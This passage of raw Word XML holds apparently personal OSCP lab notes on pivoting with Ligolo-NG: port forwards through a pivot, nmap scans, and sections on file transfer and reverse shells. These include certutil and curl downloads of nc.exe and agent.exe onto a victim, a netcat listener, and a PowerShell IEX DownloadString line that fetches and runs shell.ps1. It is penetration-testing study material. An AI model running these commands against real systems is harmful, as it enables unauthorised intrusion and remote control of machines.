    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000753">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And in the guide above, they use it to access a website that is only allowed to be accessed locally.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, if you need more complicated port forwarding, where you need to access the port of another machine (not the pivot) and you need to use the pivot to access it, then use the VPN-like experience section. The only flaw of that section is that you can't access the pivot machine's 127.0.0.1, so this local port forward section solves that</w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5u4sy8r1u3up" w:id="63"/>
      <w:bookmarkEnd w:id="63"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NMAP in Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000758">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -Pn -v &lt;subnet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000759">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV --unprivileged -Pn</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rh9et81mionu" w:id="64"/>
      <w:bookmarkEnd w:id="64"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port forward from pivot to Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000075C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP-B Challenge lab on .147 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">machine, we had command execution via mssql, but we couldn't access our kali from the .147 machine. So, we had to set up a listener on the pivot, which had access to both 192 and 10 subnet, and then we can forward traffic from pivot to kali.</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On Ligolo, can we add listener to pivot as such:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000075F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add --addr 0.0.0.0:5555 --to 127.0.0.1:5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000760">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="281"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This forwards traffic from port 5555 of pivot to our Kali on port 5555</w:t>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0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then we set up listener on port 5555 of Kali, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and we ran the reverse shell targeting the PIVOT on port 5555 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(and not our Kali), which was then forwarded to our Kali on port 5555</w:t>
      </w:r>
    </w:p>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ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And make sure to send the rev shell to the 10.10.xxx.0/24 IP of the target machine. Since the pivot has 2 IPs, you need to find the 10.10.xxx.0/24 IP, and not the 192 one. </w:t>
      </w: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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_uyjb9otocbog" w:id="65"/>
      <w:bookmarkEnd w:id="65"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File Transfer with Ligolo-NG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000076B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On attacker machine:</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add --addr 0.0.0.0:&lt;PIVOT MACHINE PORT&gt; --to 127.0.0.1:&lt;ATTACKER PORT&gt; --tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000076E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → create a port forward inside Ligolo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000076F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--addr 0.0.0.0:&lt;PIVOT MACHINE PORT&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → listen on the pivot machine on this port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000770">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--to 127.0.0.1:&lt;KALI PORT&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ forward traffic to attacker’s localhost on Kali Port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000771">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tcp </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ specifies protocol is TCP.</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This creates a port forward:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000774">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pivot listens on &lt;PIVOT_MACHINE_PORT&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000775">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="376"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Any connection hitting that port gets forwarded over the tunnel to your Kali on &lt;ATTACKER_PORT&gt;.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example – transfer file using Python HTTP server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000778">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali attacker:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000779">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add --addr 0.0.0.0:&lt;PIVOT MACHINE PORT&gt; --to 127.0.0.1:8080 --tcp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can curl from the victim machine, targeting 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://&lt;victim&gt;:8080/nc.exe</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t xml:space="preserve">Now:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000077F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim/pivot connects to http://127.0.0.1:8000 (on itself).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000780">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ligolo forwards that traffic to your Kali’s port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000781">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1372"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Victim downloads your file like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000782">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1372"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">certutil -urlcache -split -f http://127.0.0.1:8000/agent.exe agent.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000783">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p2xjlabd7c8e" w:id="66"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Shell with Ligolo-NG</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">`listener_add --addr 0.0.0.0:&lt;PIVOT MACHINE PORT&gt; --to 127.0.0.1:&lt;ATTACKER PORT&gt; --tcp`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000786">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Same format as file transfer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000787">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="129"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you set it up so when the victim runs a reverse shell to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;PIVOT MACHINE IP&gt;:&lt;PIVOT MACHINE PORT&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, Ligolo forwards it back to your attacker machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:&lt;ATTACKER PORT&gt;</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Set reverse shell to connect to pivot machine IP and port!</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example – reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000078C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000078D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="334"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvnp 4444</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In Ligolo:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000790">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="497"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listener_add --addr 0.0.0.0:9001 --to 127.0.0.1:4444 --tcp</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On victim:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000793">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://127.0.0.1:9001/shell.ps1')"</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Victim connects to port 9001, Ligolo forwards to your 4444, you catch the shell.</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e0egpwpdq1hd" w:id="67"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to delete Ligolo TUN interface for a complete reset</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000079C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On Kali Ligolo Console</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b w:val="1"/>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Delete Interface and Link</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip link set ligolo down</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000007A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1396"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip link set ligolo down</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → disable the interface.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
